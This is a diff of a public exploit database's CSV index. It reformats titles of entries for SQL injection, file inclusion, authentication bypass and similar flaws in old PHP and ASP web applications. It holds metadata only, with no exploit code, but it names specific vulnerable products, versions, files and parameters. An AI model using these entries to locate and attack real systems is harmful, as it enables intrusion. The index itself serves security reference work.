@@ -18750,7 +18754,7 @@ id,file,description,date,author,platform,type,port
 4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0
 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0
 4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0
-4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 - bbcodeSource.php Remote File Inclusion",2007-11-12,p4sswd,php,webapps,0
+4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion",2007-11-12,p4sswd,php,webapps,0
 4622,platforms/php/webapps/4622.txt,"Myspace Clone Script - SQL Injection",2007-11-13,t0pP8uZz,php,webapps,0
 4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple SQL Injections",2007-11-14,k1tk4t,php,webapps,0
 4626,platforms/php/webapps/4626.txt,"Joomla! Component Carousel Flash Image Gallery - Remote File Inclusion",2007-11-16,Crackers_Child,php,webapps,0
@@ -18786,7 +18790,7 @@ id,file,description,date,author,platform,type,port
 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0
 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0
 4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps,0
-4662,platforms/php/webapps/4662.txt,"Tilde CMS 4.x - (aarstal) SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps,0
+4662,platforms/php/webapps/4662.txt,"Tilde CMS 4.x - 'aarstal' SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps,0
 4665,platforms/php/webapps/4665.txt,"Eurologon CMS - Multiple SQL Injections",2007-11-27,KiNgOfThEwOrLd,php,webapps,0
 4666,platforms/php/webapps/4666.txt,"Eurologon CMS - files.php Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0
 4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0
@@ -18828,7 +18832,7 @@ id,file,description,date,author,platform,type,port
 4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0
 4722,platforms/php/webapps/4722.txt,"ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0
 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0
-4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 - head.php Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0
+4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 - 'head.php' Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0
 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software - (category_id) SQL Injection",2007-12-13,MurderSkillz,php,webapps,0
 4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - 'id' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0
 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - 'filedownload.php' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0
@@ -18846,7 +18850,7 @@ id,file,description,date,author,platform,type,port
 4743,platforms/php/webapps/4743.pl,"FreeWebShop 2.2.7 - 'cookie' Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0
 4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - 'search.php' SQL Injection",2007-12-18,Koller,php,webapps,0
 4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0
-4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0
+4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - 'phpdns_basedir' Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0
 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0
 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0
 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - 'output' Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0
@@ -18862,7 +18866,7 @@ id,file,description,date,author,platform,type,port
 4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - 'go.php' SQL Injection",2007-12-23,DNX,php,webapps,0
 4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0
 4776,platforms/php/webapps/4776.txt,"MMSLamp - (idpro) SQL Injection",2007-12-23,x0kster,php,webapps,0
-4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - (pageid) SQL Injection",2007-12-24,bypass,php,webapps,0
+4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - 'pageid' SQL Injection",2007-12-24,bypass,php,webapps,0
 4778,platforms/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple SQL Injections",2007-12-24,MhZ91,php,webapps,0
 4779,platforms/php/webapps/4779.php,"CuteNews 1.4.5 - Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0
 4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - 'index.php loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps,0
@@ -18877,7 +18881,7 @@ id,file,description,date,author,platform,type,port
 4790,platforms/php/webapps/4790.txt,"RunCMS 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0
 4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,php,webapps,0
 4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0
-4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (all modules) SQL Injection",2007-12-26,JosS,php,webapps,0
+4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (All Modules) SQL Injection",2007-12-26,JosS,php,webapps,0
 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0
 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
 4796,platforms/php/webapps/4796.txt,"PNPHPBB2 < 1.2i - 'PHPEx' Parameter Local File Inclusion",2007-12-26,irk4z,php,webapps,0
@@ -19046,7 +19050,7 @@ id,file,description,date,author,platform,type,port
 5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution",2008-01-30,waraxe,php,webapps,0
 5020,platforms/php/webapps/5020.txt,"Joomla! Component ChronoForms 2.3.5 - Remote File Inclusion",2008-01-30,Crackers_Child,php,webapps,0
 5021,platforms/php/webapps/5021.txt,"PHP Links 1.3 - 'id' Parameter SQL Injection",2008-01-30,Houssamix,php,webapps,0
-5022,platforms/php/webapps/5022.txt,"PHP Links 1.3 - smarty.php Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
+5022,platforms/php/webapps/5022.txt,"PHP Links 1.3 - 'smarty.php' Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
 5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion",2008-01-31,"David Wharton",php,webapps,0
 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,php,webapps,0
 5029,platforms/php/webapps/5029.txt,"Mambo Component 'com_akogallery' 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0
@@ -19370,7 +19374,7 @@ id,file,description,date,author,platform,type,port
 5470,platforms/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Blind SQL Injection",2008-04-19,The:Paradox,php,webapps,0
 5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,php,webapps,0
 5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0
-5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - Local File Inclusion (PHP5)",2008-04-19,KnocKout,php,webapps,0
+5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - PHP5 Local File Inclusion",2008-04-19,KnocKout,php,webapps,0
 5475,platforms/asp/webapps/5475.txt,"W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection",2008-04-20,U238,asp,webapps,0
 5476,platforms/php/webapps/5476.txt,"HostDirectory Pro - Insecure Cookie Handling",2008-04-20,Crackers_Child,php,webapps,0
 5477,platforms/php/webapps/5477.txt,"KubeLance 1.6.4 - 'ipn.php' Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0
@@ -21022,7 +21026,7 @@ id,file,description,date,author,platform,type,port
 7560,platforms/php/webapps/7560.txt,"CMS NetCat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0
 7561,platforms/php/webapps/7561.txt,"phpGreetCards - Cross-Site Scripting / Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0
 7562,platforms/php/webapps/7562.txt,"PHPAdBoard - (PHP uploads) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0
-7563,platforms/php/webapps/7563.txt,"phpEmployment - (PHP upload) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0
+7563,platforms/php/webapps/7563.txt,"phpEmployment - 'PHP Upload' Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0
 7565,platforms/php/webapps/7565.txt,"StormBoard 1.0.1 - SQL Injection",2008-12-23,Samir-M,php,webapps,0
 7567,platforms/php/webapps/7567.txt,"Joomla! Component com_lowcosthotels - Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0
 7568,platforms/php/webapps/7568.txt,"Joomla! Component com_allhotels - Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0
@@ -21113,7 +21117,7 @@ id,file,description,date,author,platform,type,port
 7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution",2009-01-08,StAkeR,php,webapps,0
 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
 7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
-7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - 'mydirname' Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
+7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution",2009-01-08,StAkeR,php,webapps,0
 7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0
 7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - SQL Injection",2009-01-11,EcHoLL,php,webapps,0
 7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
@@ -21500,7 +21504,7 @@ id,file,description,date,author,platform,type,port
 8366,platforms/php/webapps/8366.txt,"Joomla! Component MailTo - (article) SQL Injection",2009-04-08,H!tm@N,php,webapps,0
 8367,platforms/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - (viewit) Directory Traversal",2009-04-08,H!tm@N,php,webapps,0
 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0
-8373,platforms/php/webapps/8373.txt,"Xplode CMS - (wrap_script) SQL Injection",2009-04-08,PLATEN,php,webapps,0
+8373,platforms/php/webapps/8373.txt,"Xplode CMS - 'wrap_script' SQL Injection",2009-04-08,PLATEN,php,webapps,0
 8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - 'db.mdb' Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0
 8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - 'SEC_authenticate()' SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0
 8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,asp,webapps,0
@@ -21580,7 +21584,7 @@ id,file,description,date,author,platform,type,port
 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,php,webapps,0
 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - 'newlang' Local File Inclusion",2009-04-21,Kacper,php,webapps,0
 8505,platforms/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps,0
-8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0
+8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - 'Cat_ID' SQL Injection",2009-04-21,Player,php,webapps,0
 8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - Authentication Bypass",2009-04-21,Hakxer,php,webapps,0
 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0
 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,php,webapps,0
@@ -21754,9 +21758,9 @@ id,file,description,date,author,platform,type,port
 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0
 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,php,webapps,0
 8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0
-8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0
+8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - 'formID' SQL Injection",2009-05-26,KIM,php,webapps,0
 8811,platforms/php/webapps/8811.txt,"Joomla! Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,php,webapps,0
-8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion",2009-05-26,Nine:Situations:Group,php,webapps,0
+8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion",2009-05-26,Nine:Situations:Group,php,webapps,0
 8813,platforms/php/webapps/8813.txt,"Million Dollar Text Links 1.x - Insecure Cookie Handling",2009-05-27,HxH,php,webapps,0
 8814,platforms/php/webapps/8814.txt,"Joomla! Component AgoraGroup 0.3.5.3 - Blind SQL Injection",2009-05-27,"Chip d3 bi0s",php,webapps,0
 8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - (fiche) Local File Inclusion",2009-05-27,"ThE g0bL!N",php,webapps,0
@@ -21811,13 +21815,13 @@ id,file,description,date,author,platform,type,port
 8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0
 8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0
 8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - Authentication Bypass",2009-06-05,"ThE g0bL!N",php,webapps,0
-8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0
+8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (Delete Row) 'code' SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0
 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0
 8886,platforms/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,php,webapps,0
 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - 'zHk8dEes3.txt' File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
 8890,platforms/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
 8891,platforms/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0
-8892,platforms/php/webapps/8892.txt,"Virtue Classifieds - (category) SQL Injection",2009-06-08,OzX,php,webapps,0
+8892,platforms/php/webapps/8892.txt,"Virtue Classifieds - 'category' SQL Injection",2009-06-08,OzX,php,webapps,0
 8893,platforms/php/webapps/8893.txt,"Virtue Book Store - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0
 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0
 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0
@@ -22032,7 +22036,7 @@ id,file,description,date,author,platform,type,port
 9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - 'index.php idAuthor' SQL Injection",2009-07-24,NoGe,php,webapps,0
 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps,0
-9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0
+9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,php,webapps,0
 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - 'url' Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0
 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0
 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0
@@ -22045,7 +22049,7 @@ id,file,description,date,author,platform,type,port
 9260,platforms/php/webapps/9260.txt,"skadate dating - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
 9261,platforms/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
 9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
-9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0
+9263,platforms/php/webapps/9263.txt,"URA 3.0 - 'cat' SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0
 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - Local File Inclusion / SQL Injection",2009-07-27,SirGod,php,webapps,0
 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 - 'Cat_ID' SQL Injection",2009-07-27,octopos,php,webapps,0
 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script - 'home.php' Remote File Inclusion",2009-07-27,int_main();,php,webapps,0
@@ -22117,13 +22121,13 @@ id,file,description,date,author,platform,type,port
 9371,platforms/php/webapps/9371.txt,"opennews 1.0 - SQL Injection / Remote Code Execution",2009-08-05,SirGod,php,webapps,0
 9372,platforms/php/webapps/9372.txt,"Portel 2008 - 'decide.php patron' Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0
 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting",2009-08-06,int_main();,php,webapps,0
-9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0
+9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - 'showUid' SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0
 9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps,0
 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps,0
 9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - Authentication Bypass",2009-08-07,Red-D3v1L,php,webapps,0
 9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0
 9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0
-9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
+9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - 'idTableProduit' SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
 9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection",2009-08-07,"Jafer Al Zidjali",php,webapps,0
 9395,platforms/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,php,webapps,0
 9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0
@@ -22158,7 +22162,7 @@ id,file,description,date,author,platform,type,port
 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0
 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
-9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
+9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - 'UploadID' SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0
 9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0
 9461,platforms/php/webapps/9461.txt,"E CMS 1.0 - 'index.php s' SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0
@@ -22201,7 +22205,7 @@ id,file,description,date,author,platform,type,port
 9532,platforms/php/webapps/9532.txt,"allomani 2007 - (cat) SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0
 9533,platforms/php/webapps/9533.txt,"PHPSANE 0.5.0 - 'save.php' Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0
 9534,platforms/php/webapps/9534.txt,"Joomla! Component com_digifolio 1.52 - 'id' SQL Injection",2009-08-27,v3n0m,php,webapps,0
-9535,platforms/php/webapps/9535.txt,"Uiga Church Portal - (year) SQL Injection",2009-08-27,Mr.SQL,php,webapps,0
+9535,platforms/php/webapps/9535.txt,"Uiga Church Portal - 'year' SQL Injection",2009-08-27,Mr.SQL,php,webapps,0
 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System - 'category.php' SQL Injection",2009-08-28,Mr.SQL,php,webapps,0
 9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - 'index.php s' SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0
 9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php op' SQL Injection",2009-08-31,Mr.SQL,php,webapps,0
@@ -22276,7 +22280,7 @@ id,file,description,date,author,platform,type,port
 9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0
 9714,platforms/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0
 9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0
-9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - header.php Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0
+9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - 'header.php' Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0
 9719,platforms/multiple/webapps/9719.txt,"FanUpdate 2.2.1 - show-cat.php SQL Injection",2009-09-18,"(In)Security Romania",multiple,webapps,0
 9720,platforms/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusion",2009-09-18,NoGe,multiple,webapps,0
 9721,platforms/multiple/webapps/9721.txt,"Joomla! Component com_surveymanager 1.5.0 - SQL Injection (stype)",2009-09-21,kaMtiEz,multiple,webapps,0
@@ -22342,7 +22346,7 @@ id,file,description,date,author,platform,type,port
 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0
 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0
 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include",1999-11-05,patrick,cgi,webapps,0
-9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0
+9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0
 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0
 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0
 9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2 < 6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0
@@ -22465,9 +22469,9 @@ id,file,description,date,author,platform,type,port
 10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0
 10291,platforms/php/webapps/10291.txt,"Joomla! Component ProofReader 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps,0
 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0
-10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0
+10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - (News Module) Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0
 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0
-10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0
+10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - 'prodid' SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0
 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 10302,platforms/php/webapps/10302.txt,"427BB 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps,0
 10304,platforms/php/webapps/10304.txt,"Invision Power Board 2.3.6/3.0.4 - Local File Inclusion / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0
@@ -22882,7 +22886,7 @@ id,file,description,date,author,platform,type,port
